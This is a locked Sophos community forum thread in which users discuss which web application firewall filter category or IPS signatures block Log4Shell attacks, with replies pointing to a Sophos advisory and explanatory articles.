This discussion has been locked.

You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Which category contains the filter for Log4shell?

Hi all, which category should I enable on the "Webserver Protection", "Firewall Profiles", "Common Threat Filter Categories" to block log4j related attacks?

https://postimg.cc/mzfvCgbm

Thanks for any help!!

This thread was automatically locked due to age.

Parents

0 Amodin over 1 year ago

I thought these were already being blocked by snort rules? According to the IPS rule sheet the snort SIDs are there. So wouldn't the rule be applied no matter which you would choose?

PFSense Plus 23.05 64-bit | Intel Xeon 4-core v3 1225 3.20Ghz
16GB Memory | 500GB SSD HDD | Fiber Conn (awaiting ATT Fiber)
(Former Sophos UTM Veteran, XG Rookie)
Cancel
Vote Up 0 Vote Down

Cancel
0 papali over 1 year ago in reply to Amodin

Hi Amodin, so to understand well, the snort rules are the default ones already integrated in the IPS filter and that regardless of the categories that I can choose in the WAF filter, they will always be applied and cannot be disabled, is that correct?
Cancel
Vote Up 0 Vote Down

Cancel
0 Amodin over 1 year ago in reply to papali

That's how I *think* it works, but I could be wrong. If I am, I'd like to know myself. Hence, why I was sort of asking the question myself, haha.

PFSense Plus 23.05 64-bit | Intel Xeon 4-core v3 1225 3.20Ghz
16GB Memory | 500GB SSD HDD | Fiber Conn (awaiting ATT Fiber)
(Former Sophos UTM Veteran, XG Rookie)
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 1 year ago in reply to Amodin

Sophos does not use the standard Snort rules "only". Sophos builds own snort rules.

You find all related signatures in the Advisory: https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce

__________________________________________________________________________________________________________________
Cancel
Vote Up 0 Vote Down

Cancel
0 Amodin over 1 year ago in reply to LuCar Toni

We know the product itself is not vulnerable to it, he asked what settings to enable in WAF to prevent devices behind it from being affected. Do any of the profiles work for this? None? Is my question/statement accurate?

PFSense Plus 23.05 64-bit | Intel Xeon 4-core v3 1225 3.20Ghz
16GB Memory | 500GB SSD HDD | Fiber Conn (awaiting ATT Fiber)
(Former Sophos UTM Veteran, XG Rookie)
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 1 year ago in reply to Amodin

Log4j works differently. See the Naked Security article.

__________________________________________________________________________________________________________________
Cancel
Vote Up 0 Vote Down

Cancel

Reply

0 LuCar Toni over 1 year ago in reply to Amodin

Log4j works differently. See the Naked Security article.

__________________________________________________________________________________________________________________
Cancel
Vote Up 0 Vote Down

Cancel

Children

0 Amodin over 1 year ago in reply to LuCar Toni

I am assuming this is the article you mentioned: Log4Shell explained – how it works, why you need to know, and how to fix it – Naked Security (sophos.com)

Thank you for mentioning this, I had not seen it.

PFSense Plus 23.05 64-bit | Intel Xeon 4-core v3 1225 3.20Ghz
16GB Memory | 500GB SSD HDD | Fiber Conn (awaiting ATT Fiber)
(Former Sophos UTM Veteran, XG Rookie)
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 1 year ago in reply to Amodin

Maybe this is another good approach: https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/

__________________________________________________________________________________________________________________
Cancel
Vote Up 0 Vote Down

Cancel